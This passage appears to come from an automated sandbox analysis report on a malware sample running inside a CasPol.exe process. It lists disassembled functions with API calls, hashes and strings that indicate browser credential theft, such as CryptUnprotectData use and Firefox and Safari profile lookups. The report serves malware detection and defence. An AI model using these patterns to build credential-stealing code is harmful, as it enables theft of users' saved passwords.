                                                                                                                                                                                                                    • Opcode ID: d4540386dd2ecfa8358b54f970b731510518c9cc2a47fdc7166f1c0352bd1f31
                                                                                                                                                                                                                    • Instruction ID: e46ac8c8d649937048925bbc22b10e31c7d260e61c9919193dd0f57e0586c858
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4540386dd2ecfa8358b54f970b731510518c9cc2a47fdc7166f1c0352bd1f31
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75011E326019208FA38DCE3AC80545377E3FFCA325326C1E8D845AB579D6316802CBD4
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
                                                                                                                                                                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                      • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                                                                                                                                                    • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                                                    • API String ID: 2929817778-1134094380
                                                                                                                                                                                                                    • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                                                                                                                                    • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                                                                    • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                                                    • API String ID: 2787044678-1921111777
                                                                                                                                                                                                                    • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                                                    • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                                                    • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                                    • API String ID: 2080319088-3046471546
                                                                                                                                                                                                                    • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                                                    • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413292
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004132B4
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004132CD
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004132E1
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004132FB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413310
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004133C0
                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • {Unknown}, xrefs: 004132A6
                                                                                                                                                                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                                                    • API String ID: 4111938811-1819279800
                                                                                                                                                                                                                    • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                                                    • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 0040129E
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 829165378-0
                                                                                                                                                                                                                    • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                                                    • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                                                    • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                                                    • API String ID: 2454223109-1580313836
                                                                                                                                                                                                                    • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                                    • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                                                                                                    • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                                                                    • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                                                                      • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                                                                      • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                                                                    • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                                                                    • API String ID: 4054529287-3175352466
                                                                                                                                                                                                                    • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                                                    • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                    • API String ID: 3143752011-1996832678
                                                                                                                                                                                                                    • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                                                    • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,000000FF,00000000,00000104), ref: 00413559
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtLoadDriver,?,000000FF,00000000,00000104), ref: 0041356B
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtUnloadDriver,?,000000FF,00000000,00000104), ref: 0041357D
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject,?,000000FF,00000000,00000104), ref: 0041358F
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject,?,000000FF,00000000,00000104), ref: 004135A1
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtQueryObject,?,000000FF,00000000,00000104), ref: 004135B3
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtSuspendProcess,?,000000FF,00000000,00000104), ref: 004135C5
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtResumeProcess,?,000000FF,00000000,00000104), ref: 004135D7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                    • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                                                    • API String ID: 667068680-2887671607
                                                                                                                                                                                                                    • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                                    • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                    • API String ID: 1607361635-601624466
                                                                                                                                                                                                                    • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                                                    • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                    • API String ID: 2000436516-3842416460
                                                                                                                                                                                                                    • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                                    • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                      • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                      • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                      • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000076), ref: 00403634
